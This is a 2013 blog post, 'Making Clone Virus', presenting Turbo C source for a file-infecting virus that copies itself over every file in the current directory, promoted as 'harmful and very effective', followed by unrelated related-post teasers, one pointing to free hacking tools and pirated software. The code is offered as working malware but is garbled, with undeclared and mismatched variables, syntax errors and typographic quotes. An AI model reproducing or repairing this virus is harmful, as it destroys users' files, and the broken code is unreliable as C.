Definition List

4 Dec 2013

Making Clone Virus

·    Effect –>  Harmful and very effective.
·    Coding Platform –>  C, Turbo C.
·   Working : on execution this virus does is it makes all the files in the current directory a virus. Just remember to run this virus inside a new folder that contains no important exe and normal files . This virus will make them too as virus.
***************************************************
FILE *Ron *vRon;
int owned = 0;
unsigned long x;
char buff[256];
struct ffblk ffblk;
clock_t st, end;
main()
{
 st=clock();
 clrscr();
 owned=(find_first(“*.*”, &ffblk,0);
 while(!done)
 {
 Ron=fopen(_arg[0], “rb”);
 vhost=fopen(ffblk.ff_name, “rb+”);
 if (vhost = =NULL)
 goto next;
 x = 89088;
 printf(“infecting %s\n”, ffblk.ff_name);
 while(x>2048)
 {
 fread(buff,256,1,Ron);
 fwrite(buff,256,1,vRon);
 x – = 2048;
 }
 fread(buff,x,1,Ron);
 fwrite(buff,x,1,vRon);
 a++;
 next:      fcloseall();
 owned = findnext(&ffblk);
 }
 end = clock()
 printf(“Infected %d files in %f sec”, a, (end-st)/CLK_TCk);
 return (0);
}

Related Posts:

  • Mussolini Mussolini A Biography of Benito Mussolini, Fascist Dictator of Italy  Historical Importance of Benito Mussolini: Benito Mussolini served as Italy’s 40th Prime Minister from 1922 until 1943. He is considered a cen… Read More
  • Jane Goodall Jane Goodall:- (Chimpanzee Researcher and Activist) Who Is Jane Goodall? Jane Goodall is a renowned British primatologist and ethologist, who expanded our understanding of chimpanzees and the scientific world’s way of… Read More
  • How to Download Torrent Files With IDM for free? Steps:: 1)First Download Internet Download Manager from this link>>>                          http://hackthehacker.webs.com/hackingtoolsfree.htm 2… Read More
  • Queen Victoria Normal 0 false false false EN-US X-NONE X-NONE MicrosoftInternetExplorer4 Queen Victo… Read More
  • Joseph Stalin Joseph Stalin:- Who Was Joseph Stalin?:-Dates: December 6, 1878 – March 5, 1953 Also Known As: Ioseb Djugashvili (born as), Sosa, Koba Who Was Joseph Stalin? Joseph Stalin was the Communist, totalitarian leader of th… Read More

0 comments:

Post a Comment